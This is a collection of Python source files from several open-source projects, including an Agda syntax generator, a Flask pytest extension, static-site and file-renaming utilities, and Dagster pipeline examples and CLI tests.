for k, v in ren_dict.items():
# Handle parallel name:symbol renames
if ":" in k and ":" in v:
kw, ks = splitstrip(k, ":")
vw, *vs = splitstrip(v, ":")
mod_dict['renaming'][kw] = vw
mod_dict['renaming_sym'][ks] = vs[0]
# Fixity redeclaration
if len(vs) == 2:
if 'fixity' in mod_dict:
mod_dict['fixity'][kw] = vs[1]
else:
mod_dict['fixity'] = {kw : vs[1]}
else:
mod_dict['renaming'][k] = v
if 'using' in mod_dict:
mod_dict['using'] = mod_dict['using'] + list(mod_dict['renaming'].keys())
if 'hiding' in mod_dict:
mod_dict['hiding'] = [t for t in mod_dict['hiding'] if t not in mod_dict['renaming'].keys()]
return mod_dict
def read_syn(file):
"""Read syntax file.
Args:
file (str): File path containing syntax description.
    Raises:
        Exception: If the 'hiding' and 'using' modifiers are used together in an import.
Returns:
Syntax: Syntax extracted from the file.
"""
ls = []
path = Path(file)
dirname = path.parent
with open(file, 'r') as fp:
ls = [l.rstrip() for l in fp.read().splitlines() if l and not l.strip().startswith('--')]
has_ty, has_tm, has_th = [kw in ls for kw in ["type", "term", "theory"]]
# Collect type signature lines
print("Collecting type signature lines")
ty_lines = []
if has_ty:
ty_pos = ls.index("type")
for l in ls[ty_pos+1:]:
if not re.search("^\s+.*$", l):
break
ty_lines.append(l.strip())
# Collect term signature lines
print("Collecting term signature lines")
tm_lines = []
if has_tm:
tm_pos = ls.index("term")
for l in ls[tm_pos+1:]:
if not re.search("^\s+.*$", l):
break
tm_lines.append(l.strip())
# Collect equation and property lines
print("Equation and property lines")
eq_lines = []
prop_lines = []
if has_th:
th_pos = ls.index("theory")
for l in ls[th_pos+1:]:
if not re.search("^\s+.*$", l):
break
# Handle line breaks
if not (l.strip().startswith("{") or l.strip().startswith("(") or l.strip().startswith("'")):
prev_l = eq_lines.pop()
eq_lines.append(prev_l + " " + l.strip())
elif l.strip().startswith("'"):
prop_lines.append(l.strip())
else:
eq_lines.append(l.strip())
# Parsing type operators
print("Parsing type operators")
ty_ops = []
derived = False
for l in ty_lines:
if l[0] == "{" and l[-1] == "}":
derived = True
l = l[1:-1]
nm, sig = splitstrip(l, ':')
if '|' in sig:
ar, fix = splitstrip(sig, '|')
else:
ar, fix = sig[0], None
ty_ops.append(TyOp(nm, int(ar[0]), fix, derived))
# Parsing term operators
print("Parsing term operators")
tm_ops = []
derived = False
for l in tm_lines:
if l[0] == "{" and l[-1] == "}":
derived = True
l = l[1:-1]
if '|' in l:
sig, props = splitstrip(l, '|')
sym, *fix = props.split()
else:
sig = l
sym, fix = None, None
tm_ops.append(op(sig, sym, fix[0] if fix else None, derived))
# Extract signature name
print("Extracting signature name")
if "|" in ls[0]:
m = re.search("^syntax ([^ ]*) *\| *([^ ]*)", ls[0])
syn_name = m.group(1)
tm_name = m.group(2)
else:
m = re.search("^syntax ([^ ]*)", ls[0])
syn_name = m.group(1)
tm_name = m.group(1)
ty_name = tm_name + "T"
if "extends" in ls[0]: # Syntax extends another file
print("Syntax extends another file")
if ls[0].strip().endswith('extends'): # Extension with modification
ext_list = []
i = 1
while i < len(ls):
l = ls[i].strip()
if l.startswith("- "):
ext_list.append(ls[i])
elif l != "type" and l != "term" and l != "theory":
# Handle line breaks
prev_l = ext_list.pop()
ext_list.append(prev_l + l)
else: break
i += 1
mod_syns = []
for ext in ext_list:
m = re.search('\s*-\s+([^ ]+)(?:\s*\(([^)]*)\))?', ext)
f, mods = m.groups()
# Recursively read base syntax files
syn = read_syn(PurePath(dirname,f))
# Apply modifiers
if mods:
if "using" in mods and "hiding" in mods:
raise Exception("The 'hiding' and 'using' modifiers are not allowed together.")
mod_dict = parse_mods(mods)
if 'hiding' in mod_dict:
syn.hide_tokens(mod_dict['hiding'])
elif 'using' in mod_dict:
syn.keep_tokens(mod_dict['using'])
if 'deriving' in mod_dict:
syn.derive_tokens(mod_dict['deriving'])
if 'fixity' in mod_dict:
syn.change_fixity(mod_dict['fixity'])
if 'renaming' in mod_dict:
syn.rename_tokens(mod_dict['renaming'])
if 'renaming_sym' in mod_dict:
syn.rename_sym_in_tokens(mod_dict['renaming_sym'])
mod_syns.append(syn)
base_syn = combine_syntax_list(mod_syns)
else: # Extension without modification
print("Extension without modification")
m = re.search("extends (.*)$", ls[0])
files = splitstrip(m.group(1), ",")
base_syns = [read_syn(PurePath(dirname,f)) for f in files]
base_syn = combine_syntax_list(base_syns)
ops = {op.name : op.sym for op in base_syn.tm_sig.all_ops + tm_ops}
ext_syn = Syntax(syn_name,
TypeSignature(ty_name, *ty_ops) if has_ty else Unsorted(),
TermSignature(tm_name, *tm_ops),
Theory.mk(prop_lines, eq_lines, ops))
return combine_syntaxes(base_syn, ext_syn, syn_name, tm_name)
else: # No extension
print("No extension")
ops = {op.name : op.sym for op in tm_ops}
return Syntax(syn_name,
TypeSignature(ty_name, *ty_ops) if has_ty else Unsorted(),
TermSignature(tm_name, *tm_ops),
Theory.mk(prop_lines, eq_lines, ops))
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(prog="soas", description='Produce an Agda formalisation from a syntax description file')
arg_parser.add_argument("Syntax", metavar="path",type=Path, help="path to syntax file")
arg_parser.add_argument("-o", "--out", type=Path, action="store", help="output folder for generated Agda modules")
args = arg_parser.parse_args()
syntax = read_syn(args.Syntax)
syntax.render_agda(args.out)
print(syntax.syn_name + " syntax generated successfully.")
``` |
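The script is driven by a syntax description file; below is a hedged sketch of using it programmatically, where the file name, its contents, and the output path are placeholders:
```python
# Placeholder paths; requires a syntax description file in the format read_syn expects.
from pathlib import Path
from soas import read_syn

syntax = read_syn(Path("examples/monoid.syn"))  # hypothetical description file
print(syntax)                                   # pretty-printed signature and theory
syntax.render_agda(Path("out"))                 # writes Agda modules under out/<syntax name>/
```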
{
"source": "joeyespo/flask-pytest",
"score": 2
} |
#### File: flask-pytest/flask_pytest/__init__.py
```python
from __future__ import print_function
import os
from multiprocessing import Process
import pytest
__version__ = '0.0.5'
BEEP_CHARACTER = '\a'
def bool_config(app, setting, default=None):
value = app.config.get(setting)
return (default
if value is None else
str(app.config.get(setting)).lower() == 'true')
def run_tests_sync(beep=True, exitfirst=True, quiet=True, *extra_args):
argv = []
if exitfirst:
argv += ['--exitfirst']
if quiet:
argv += ['--quiet']
if extra_args:
argv += extra_args
exit_code = pytest.main(argv)
if exit_code != 0 and beep:
print(BEEP_CHARACTER, end='')
def start_tests(beep=True, exitfirst=True, quiet=True, *extra_args):
print('Running tests...')
p = Process(target=run_tests_sync, name='background-pytest',
args=(beep, exitfirst, quiet) + extra_args)
p.daemon = True
p.start()
def FlaskPytest(app, *extra_args):
inner_run = app.run
def run_app(*args, **kwargs):
if (app.debug and os.environ.get('WERKZEUG_RUN_MAIN') and
bool_config(app, 'FLASK_PYTEST_ENABLED', True)):
start_tests(
bool_config(app, 'FLASK_PYTEST_BEEP', True),
bool_config(app, 'FLASK_PYTEST_EXITFIRST', True),
bool_config(app, 'FLASK_PYTEST_QUIET', True),
*extra_args)
return inner_run(*args, **kwargs)
# Override the built-in run method and return the app
app.run = run_app
return app
``` |
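A minimal usage sketch of the extension above (the app setup is assumed, not taken from the package's docs):
```python
# Minimal sketch: wrap a Flask app so pytest runs in the background in debug mode.
from flask import Flask
from flask_pytest import FlaskPytest

app = FlaskPytest(Flask(__name__))
app.config['FLASK_PYTEST_BEEP'] = False   # optional: silence the terminal bell on failures

if __name__ == '__main__':
    # Tests start in the Werkzeug reloader's child process (WERKZEUG_RUN_MAIN is set there).
    app.run(debug=True)
```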
{
"source": "joeyespo/gitpress",
"score": 3
} |
#### File: gitpress/gitpress/building.py
```python
import os
from .repository import require_repo, presentation_files
from .helpers import copy_files, remove_directory
default_out_directory = '_site'
def build(content_directory=None, out_directory=None):
"""Builds the site from its content and presentation repository."""
content_directory = content_directory or '.'
out_directory = os.path.abspath(out_directory or default_out_directory)
repo = require_repo(content_directory)
# Prevent user mistakes
    if out_directory == os.path.abspath(content_directory):
        raise ValueError('Output directory must be different than the source directory: ' + repr(out_directory))
if os.path.basename(os.path.relpath(out_directory, content_directory)) == '..':
raise ValueError('Output directory must not contain the source directory: ' + repr(out_directory))
# TODO: read config
# TODO: use virtualenv
# TODO: init and run plugins
# TODO: process with active theme
# Collect and copy static files
files = presentation_files(repo)
remove_directory(out_directory)
copy_files(files, out_directory, repo)
return out_directory
```
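A hedged sketch of calling `build` directly; the paths are placeholders, and the content directory must already be a gitpress repository for `require_repo` to succeed:
```python
# Placeholder paths; require_repo() will fail unless the directory is a gitpress repo.
from gitpress.building import build

site_dir = build('path/to/content', '_site')
print('Site written to', site_dir)
```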
#### File: gitpress/gitpress/previewing.py
```python
import os
import SocketServer
import SimpleHTTPServer
from .building import build
def preview(directory=None, host=None, port=None, watch=True):
"""Runs a local server to preview the working directory of a repository."""
directory = directory or '.'
host = host or '127.0.0.1'
port = port or 5000
# TODO: admin interface
# TODO: use cache_only to keep from modifying output directly
out_directory = build(directory)
# Serve generated site
os.chdir(out_directory)
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer((host, port), Handler)
print ' * Serving on http://%s:%s/' % (host, port)
httpd.serve_forever()
``` |
{
"source": "joeyespo/nosey",
"score": 2
} |
#### File: nosey/nosey/command.py
```python
import sys
from docopt import docopt
from .watcher import watch
from . import __version__
def main(argv=None):
"""The entry point of the application."""
if argv is None:
argv = sys.argv[1:]
usage = '\n\n\n'.join(__doc__.split('\n\n\n')[1:])
version = 'Nosey ' + __version__
# Parse options
args = docopt(usage, argv=argv, version=version)
# Execute
return watch(args['<directory>'], args['--clear'])
``` |
{
"source": "joeyespo/prefix",
"score": 4
} |
#### File: joeyespo/prefix/prepend.py
```python
import os
import sys
def prepend(prefix, ext):
cwd = os.getcwd()
for filename in os.listdir(cwd):
if os.path.splitext(filename)[1] != ext:
continue
newname = prefix + filename
try:
os.rename(filename, newname)
except Exception as ex:
print ' *** ', ex
continue
print filename, '->', newname
def main():
if len(sys.argv) <= 2:
print 'usage: pre <filename-prefix> <extension>'
return 1
prepend(sys.argv[1], sys.argv[2])
return 0
if __name__ == '__main__':
main()
``` |
{
"source": "joeyespo/tabhouse.org",
"score": 3
} |
#### File: joeyespo/tabhouse.org/helper.py
```python
import os
import logging
from logging.handlers import SMTPHandler
from flask import url_for, current_app
def try_parse_int(s, default_value=None):
"""Parse an integer or return a default value if it cannot be done or the string is None."""
try:
return int(s) if s is not None else default_value
except ValueError:
return default_value
def add_jinja_helpers(app):
"""Adds helper globals to jinja."""
# Static file helpers
app.jinja_env.globals.update(static_for=static_for)
def static_for(filename, endpoint='.static'):
"""Provides the 'static' function that also appends the file's timestamp to the URL, usable in a template."""
return url_for(endpoint, filename=filename) + '?' + str(int(os.path.getmtime(os.path.join(current_app.static_folder, filename))))
def email_errors(app, email_info=None, error_level=logging.ERROR):
"""Enables error reporting using SMTP for the provided app."""
if not email_info:
email_info = app.config.get('ERROR_EMAIL_INFO')
if not email_info:
return
mailhost, from_address, to_addresses, subject, credentials = email_info
mail_handler = TlsSMTPHandler(mailhost, from_address, to_addresses, subject, credentials)
if error_level:
mail_handler.setLevel(error_level)
app.logger.addHandler(mail_handler)
class TlsSMTPHandler(SMTPHandler):
"""A TLS implementation of SMTPHandler."""
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
import string
try:
from email.utils import formatdate
except ImportError:
formatdate = self.date_time
port = self.mailport or smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (self.fromaddr, string.join(self.toaddrs, ","), self.getSubject(record), formatdate(), msg)
# --- Begin TLS support ---
if self.username:
smtp.ehlo()
smtp.starttls()
smtp.ehlo()
smtp.login(self.username, self.password)
# --- End TLS support ---
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
``` |
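A hypothetical wiring of these helpers into a Flask app; all addresses and credentials below are placeholders:
```python
# Placeholder SMTP details; the five-element tuple matches what email_errors unpacks.
from flask import Flask
from helper import add_jinja_helpers, email_errors

app = Flask(__name__)
app.config['ERROR_EMAIL_INFO'] = (
    ('smtp.example.com', 587),        # mailhost as a (host, port) pair
    'errors@example.com',             # from address
    ['admin@example.com'],            # to addresses
    'Site error',                     # email subject
    ('smtp-user', 'smtp-password'),   # credentials used for the TLS login
)
add_jinja_helpers(app)
email_errors(app)
```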
{
"source": "JoeyforJoy/b2x",
"score": 3
} |
#### File: JoeyforJoy/b2x/bag2sync_img2.py
```python
import os
from os import system
import argparse
def parse_args():
parser = argparse.ArgumentParser(description="Transfer rosbag to images.")
parser.add_argument("bag_file", type=str, help = "the path of bag file")
parser.add_argument("topic_img1", type=str, help = "the name of the image1 topic")
parser.add_argument("topic_img2", type=str, help = "the name of the image2 topic")
parser.add_argument("--output_dir", type=str, default="./data/synchronized",
help = "the root directory of the output files")
parser.add_argument("--img1_dir_label", type=str, default="pcd",
help = "the subdirectory name of output pcds")
parser.add_argument("--img2_dir_label", type=str, default="image",
help = "the subdirectory name of output images")
parser.add_argument("--tot", type=float, default=0.01,
help = "the tolerence of time synchronization")
return parser.parse_args()
if __name__ == "__main__":
args = parse_args()
if not os.path.exists("./devel/setup.bash"):
print("ERROR. './devel/setup.bash' must exist")
exit()
system("roscore&")
system(". ./devel/setup.sh; \
rosrun b2x time_sync_cam2.py %s %s --output_dir %s --tot %s \
--img1_dir_label %s --img2_dir_label %s &" %
(args.topic_img1, args.topic_img2, args.output_dir, args.tot, \
args.img1_dir_label, args.img2_dir_label))
system("rosbag play %s" % (args.bag_file))
system("killall rosbag; killall roscore; sleep 1;")
``` |
{
"source": "joeyfreund/dagster",
"score": 2
} |
#### File: examples/airflow_ingest/repo.py
```python
from dagster_airflow.dagster_pipeline_factory import make_dagster_pipeline_from_airflow_dag
from dagster import repository
from .airflow_complex_dag import complex_dag
from .airflow_simple_dag import simple_dag
airflow_simple_dag = make_dagster_pipeline_from_airflow_dag(simple_dag)
airflow_complex_dag = make_dagster_pipeline_from_airflow_dag(complex_dag)
@repository
def airflow_ingest_example():
return [airflow_complex_dag, airflow_simple_dag]
```
#### File: examples/emr_pyspark/repo.py
```python
from dagster_aws.emr import emr_pyspark_step_launcher
from dagster_aws.s3 import s3_plus_default_storage_defs, s3_resource
from dagster_pyspark import DataFrame as DagsterPySparkDataFrame
from dagster_pyspark import pyspark_resource
from pyspark.sql import DataFrame, Row
from pyspark.sql.types import IntegerType, StringType, StructField, StructType
from dagster import (
ModeDefinition,
PresetDefinition,
make_python_type_usable_as_dagster_type,
pipeline,
repository,
solid,
)
from dagster.core.definitions.no_step_launcher import no_step_launcher
# Make pyspark.sql.DataFrame map to dagster_pyspark.DataFrame
make_python_type_usable_as_dagster_type(python_type=DataFrame, dagster_type=DagsterPySparkDataFrame)
@solid(required_resource_keys={'pyspark', 'pyspark_step_launcher'})
def make_people(context) -> DataFrame:
schema = StructType([StructField('name', StringType()), StructField('age', IntegerType())])
rows = [Row(name='Thom', age=51), Row(name='Jonny', age=48), Row(name='Nigel', age=49)]
return context.resources.pyspark.spark_session.createDataFrame(rows, schema)
@solid(required_resource_keys={'pyspark_step_launcher'})
def filter_over_50(_, people: DataFrame) -> DataFrame:
return people.filter(people['age'] > 50)
@solid(required_resource_keys={'pyspark_step_launcher'})
def count_people(_, people: DataFrame) -> int:
return people.count()
emr_mode = ModeDefinition(
name='emr',
resource_defs={
'pyspark_step_launcher': emr_pyspark_step_launcher,
'pyspark': pyspark_resource,
's3': s3_resource,
},
system_storage_defs=s3_plus_default_storage_defs,
)
emr_preset = PresetDefinition.from_pkg_resources(
name='emr',
mode='emr',
pkg_resource_defs=[('emr_pyspark', 'prod_resources.yaml'), ('emr_pyspark', 's3_storage.yaml')],
)
local_mode = ModeDefinition(
name='local',
resource_defs={'pyspark_step_launcher': no_step_launcher, 'pyspark': pyspark_resource},
)
@pipeline(
mode_defs=[emr_mode, local_mode], preset_defs=[emr_preset],
)
def my_pipeline():
count_people(filter_over_50(make_people()))
@repository
def emr_pyspark_example():
return [my_pipeline]
```
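A hedged sketch of running the pipeline locally with the legacy `execute_pipeline` API; the module name is assumed from the file path, and a local PySpark installation is required:
```python
# Sketch only: assumes this file is importable as `repo` and pyspark is installed.
from dagster import execute_pipeline
from repo import my_pipeline

result = execute_pipeline(my_pipeline, mode='local')
assert result.success
```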
#### File: dagster_examples/gcp_data_platform/simple_pipeline.py
```python
import datetime
import os
from dagster_gcp.bigquery.resources import bigquery_resource
from dagster_gcp.dataproc.resources import DataprocResource
from google.cloud.bigquery.job import LoadJobConfig, QueryJobConfig
from dagster import InputDefinition, ModeDefinition, Nothing, pipeline, solid
PROJECT_ID = os.getenv('GCP_PROJECT_ID')
DEPLOY_BUCKET_PREFIX = os.getenv('GCP_DEPLOY_BUCKET_PREFIX')
INPUT_BUCKET = os.getenv('GCP_INPUT_BUCKET')
OUTPUT_BUCKET = os.getenv('GCP_OUTPUT_BUCKET')
REGION = 'us-west1'
LATEST_JAR_HASH = '214f4bff2eccb4e9c08578d96bd329409b7111c8'
DATAPROC_CLUSTER_CONFIG = {
'projectId': PROJECT_ID,
'clusterName': 'gcp-data-platform',
'region': 'us-west1',
'cluster_config': {
'masterConfig': {'machineTypeUri': 'n1-highmem-4'},
'workerConfig': {'numInstances': 0},
'softwareConfig': {
'properties': {
# Create a single-node cluster
# This needs to be the string "true" when
# serialized, not a boolean true
'dataproc:dataproc.allow.zero.workers': 'true'
}
},
},
}
@solid
def create_dataproc_cluster(_):
DataprocResource(DATAPROC_CLUSTER_CONFIG).create_cluster()
@solid(config_schema={'date': str}, input_defs=[InputDefinition('start', Nothing)])
def data_proc_spark_operator(context):
dt = datetime.datetime.strptime(context.solid_config['date'], "%Y-%m-%d")
cluster_resource = DataprocResource(DATAPROC_CLUSTER_CONFIG)
job_config = {
'job': {
'placement': {'clusterName': 'gcp-data-platform'},
'reference': {'projectId': PROJECT_ID},
'sparkJob': {
'args': [
'--gcs-input-bucket',
INPUT_BUCKET,
'--gcs-output-bucket',
OUTPUT_BUCKET,
'--date',
dt.strftime('%Y-%m-%d'),
],
'mainClass': 'io.dagster.events.EventPipeline',
'jarFileUris': [
'%s/events-assembly-%s.jar' % (DEPLOY_BUCKET_PREFIX, LATEST_JAR_HASH)
],
},
},
'projectId': PROJECT_ID,
'region': REGION,
}
job = cluster_resource.submit_job(job_config)
job_id = job['reference']['jobId']
cluster_resource.wait_for_job(job_id)
@solid(input_defs=[InputDefinition('start', Nothing)])
def delete_dataproc_cluster(_):
DataprocResource(DATAPROC_CLUSTER_CONFIG).delete_cluster()
@solid(
config_schema={'date': str},
input_defs=[InputDefinition('start', Nothing)],
required_resource_keys={'bigquery'},
)
def gcs_to_bigquery(context):
dt = datetime.datetime.strptime(context.solid_config['date'], "%Y-%m-%d")
bq = context.resources.bigquery
destination = '{project_id}.events.events${date}'.format(
project_id=PROJECT_ID, date=dt.strftime('%Y%m%d')
)
load_job_config = LoadJobConfig(
source_format='PARQUET',
create_disposition='CREATE_IF_NEEDED',
write_disposition='WRITE_TRUNCATE',
)
source_uris = [
'gs://{bucket}/{date}/*.parquet'.format(bucket=OUTPUT_BUCKET, date=dt.strftime('%Y/%m/%d'))
]
bq.load_table_from_uri(source_uris, destination, job_config=load_job_config).result()
@solid(input_defs=[InputDefinition('start', Nothing)],)
def explore_visits_by_hour(context):
bq = context.resources.bigquery
query_job_config = QueryJobConfig(
destination='%s.aggregations.explore_visits_per_hour' % PROJECT_ID,
create_disposition='CREATE_IF_NEEDED',
write_disposition='WRITE_TRUNCATE',
)
sql = '''
SELECT FORMAT_DATETIME("%F %H:00:00", DATETIME(TIMESTAMP_SECONDS(CAST(timestamp AS INT64)))) AS ts,
COUNT(1) AS num_visits
FROM events.events
WHERE url = '/explore'
GROUP BY ts
ORDER BY ts ASC
'''
bq.query(sql, job_config=query_job_config)
@pipeline(mode_defs=[ModeDefinition(resource_defs={'bigquery': bigquery_resource})])
def gcp_data_platform():
dataproc_job = delete_dataproc_cluster(data_proc_spark_operator(create_dataproc_cluster()))
events_in_bq = gcs_to_bigquery(dataproc_job)
explore_visits_by_hour(events_in_bq)
```
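The two dated solids take their partition date from solid config; below is a hedged sketch of the run configuration shape. The date is a placeholder, and actually executing this needs real GCP credentials, buckets, and the environment variables above:
```python
# Config shape only; running it for real requires the GCP env vars and resources above.
from dagster import execute_pipeline
from simple_pipeline import gcp_data_platform   # module name assumed from the file path

run_config = {
    'solids': {
        'data_proc_spark_operator': {'config': {'date': '2020-01-01'}},
        'gcs_to_bigquery': {'config': {'date': '2020-01-01'}},
    }
}
result = execute_pipeline(gcp_data_platform, run_config=run_config)
```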
#### File: dagster_examples/toys/stdout_spew.py
```python
import os
import sys
import time
from datetime import datetime
from dagster import (
InputDefinition,
ModeDefinition,
Output,
OutputDefinition,
String,
pipeline,
solid,
)
from dagster.core.definitions.executor import default_executors
NUM_LOOP = 120
REP_INTERVAL = 0.5
@solid(output_defs=[OutputDefinition(String, 'out_1'), OutputDefinition(String, 'out_2')])
def spawn(_):
yield Output('A', 'out_1')
yield Output('B', 'out_2')
@solid(input_defs=[InputDefinition('name', String)])
def spew(_, name):
i = 0
while i < NUM_LOOP:
print('{} {} OUT {}: {}'.format(os.getpid(), name, i, datetime.now()), file=sys.stdout)
print('{} {} ERROR {}: {}'.format(os.getpid(), name, i, datetime.now()), file=sys.stderr)
time.sleep(REP_INTERVAL)
i += 1
@pipeline(
description='Demo pipeline that streams out logs to the compute logs stdout/stderr.',
mode_defs=[ModeDefinition(executor_defs=default_executors)],
)
def stdout_spew_pipeline():
out_1, out_2 = spawn()
spew(name=out_1)
spew(name=out_2)
```
#### File: dagster_tests/api_tests/api_tests_repo.py
```python
import string
from dagster import (
InputDefinition,
Int,
OutputDefinition,
PartitionSetDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository,
solid,
usable_as_dagster_type,
)
@lambda_solid
def do_something():
return 1
@lambda_solid
def do_input(x):
return x
@pipeline(name='foo')
def foo_pipeline():
do_input(do_something())
@pipeline(name='baz', description='Not much tbh')
def baz_pipeline():
do_input()
def define_foo_pipeline():
return foo_pipeline
@pipeline(name="bar")
def bar_pipeline():
@usable_as_dagster_type(name='InputTypeWithoutHydration')
class InputTypeWithoutHydration(int):
pass
@solid(output_defs=[OutputDefinition(InputTypeWithoutHydration)])
def one(_):
return 1
@solid(
input_defs=[InputDefinition('some_input', InputTypeWithoutHydration)],
output_defs=[OutputDefinition(Int)],
)
def fail_subset(_, some_input):
return some_input
return fail_subset(one())
def define_bar_schedules():
return {
'foo_schedule': ScheduleDefinition(
"foo_schedule", cron_schedule="* * * * *", pipeline_name="test_pipeline", run_config={},
)
}
def error_partition_fn():
raise Exception('womp womp')
def error_partition_config_fn():
raise Exception('womp womp')
def error_partition_tags_fn(_partition):
raise Exception('womp womp')
def define_baz_partitions():
return {
'baz_partitions': PartitionSetDefinition(
name='baz_partitions',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=lambda partition: {
'solids': {'do_input': {'inputs': {'x': {'value': partition.value}}}}
},
tags_fn_for_partition=lambda _partition: {'foo': 'bar'},
),
'error_partitions': PartitionSetDefinition(
name='error_partitions',
pipeline_name='baz',
partition_fn=error_partition_fn,
run_config_fn_for_partition=lambda partition: {},
),
'error_partition_config': PartitionSetDefinition(
name='error_partition_config',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=error_partition_config_fn,
),
'error_partition_tags': PartitionSetDefinition(
name='error_partition_tags',
pipeline_name='baz',
partition_fn=lambda: string.ascii_lowercase,
run_config_fn_for_partition=lambda partition: {},
tags_fn_for_partition=error_partition_tags_fn,
),
}
@repository
def bar_repo():
return {
'pipelines': {
'foo': define_foo_pipeline,
'bar': lambda: bar_pipeline,
'baz': lambda: baz_pipeline,
},
'schedules': define_bar_schedules(),
'partition_sets': define_baz_partitions(),
}
```
#### File: dagster-graphql/dagster_graphql_tests/test_cli.py
```python
import json
import os
import time
from contextlib import contextmanager
from click.testing import CliRunner
from dagster_graphql.cli import ui
from dagster import (
InputDefinition,
Int,
OutputDefinition,
ScheduleDefinition,
lambda_solid,
pipeline,
repository,
seven,
)
from dagster.core.instance import DagsterInstance
from dagster.core.storage.pipeline_run import PipelineRunStatus
from dagster.utils import file_relative_path
@contextmanager
def dagster_cli_runner():
with seven.TemporaryDirectory() as dagster_home_temp:
yield CliRunner(env={'DAGSTER_HOME': dagster_home_temp})
@lambda_solid(input_defs=[InputDefinition('num', Int)], output_def=OutputDefinition(Int))
def add_one(num):
return num + 1
@lambda_solid(input_defs=[InputDefinition('num', Int)], output_def=OutputDefinition(Int))
def mult_two(num):
return num * 2
@pipeline
def math():
mult_two(add_one())
def define_schedules():
math_hourly_schedule = ScheduleDefinition(
name="math_hourly_schedule",
cron_schedule="0 0 * * *",
pipeline_name="math",
run_config={'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
)
return [math_hourly_schedule]
@repository
def test():
return [math] + define_schedules()
def test_basic_introspection():
query = '{ __schema { types { name } } }'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']
def test_basic_repositories():
query = '{ repositoriesOrError { ... on RepositoryConnection { nodes { name } } } }'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']['repositoriesOrError']['nodes']
def test_basic_variables():
query = '''
query FooBar($pipelineName: String! $repositoryName: String! $repositoryLocationName: String!){
pipelineOrError(params:{pipelineName: $pipelineName repositoryName: $repositoryName repositoryLocationName: $repositoryLocationName})
{ ... on Pipeline { name } }
}
'''
variables = '{"pipelineName": "math", "repositoryName": "test", "repositoryLocationName": "<<in_process>>"}'
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(ui, ['-w', workspace_path, '-v', variables, '-t', query])
assert result.exit_code == 0
result_data = json.loads(result.output)
assert result_data['data']['pipelineOrError']['name'] == 'math'
LAUNCH_PIPELINE_EXECUTION_QUERY = '''
mutation ($executionParams: ExecutionParams!) {
launchPipelineExecution(executionParams: $executionParams) {
__typename
... on LaunchPipelineRunSuccess {
run {
runId
pipeline { ...on PipelineReference { name } }
}
}
... on PipelineConfigValidationInvalid {
pipelineName
errors { message }
}
... on PipelineNotFoundError {
pipelineName
}
... on PythonError {
message
stack
}
}
}
'''
def test_start_execution_text():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-t', LAUNCH_PIPELINE_EXECUTION_QUERY]
)
assert result.exit_code == 0
try:
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
except Exception as e:
raise Exception('Failed with {} Exception: {}'.format(result.output, e))
def test_start_execution_file():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'pipelineName': 'math',
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui,
[
'-w',
workspace_path,
'-v',
variables,
'--file',
file_relative_path(__file__, './execute.graphql'),
],
)
assert result.exit_code == 0
result_data = json.loads(result.output.strip('\n').split('\n')[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_start_execution_save_output():
'''
Test that the --output flag saves the GraphQL response to the specified file
'''
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
with seven.TemporaryDirectory() as temp_dir:
file_name = os.path.join(temp_dir, 'output_file')
result = runner.invoke(
ui,
[
'-w',
workspace_path,
'-v',
variables,
'--file',
file_relative_path(__file__, './execute.graphql'),
'--output',
file_name,
],
)
assert result.exit_code == 0
assert os.path.isfile(file_name)
with open(file_name, 'r') as f:
lines = f.readlines()
result_data = json.loads(lines[-1])
assert (
result_data['data']['launchPipelineExecution']['__typename']
== 'LaunchPipelineRunSuccess'
)
def test_start_execution_predefined():
variables = seven.json.dumps(
{
'executionParams': {
'selector': {
'repositoryLocationName': '<<in_process>>',
'repositoryName': 'test',
'pipelineName': 'math',
},
'runConfigData': {'solids': {'add_one': {'inputs': {'num': {'value': 123}}}}},
'mode': 'default',
}
}
)
workspace_path = file_relative_path(__file__, './cli_test_workspace.yaml')
with dagster_cli_runner() as runner:
result = runner.invoke(
ui, ['-w', workspace_path, '-v', variables, '-p', 'launchPipelineExecution']
)
assert result.exit_code == 0
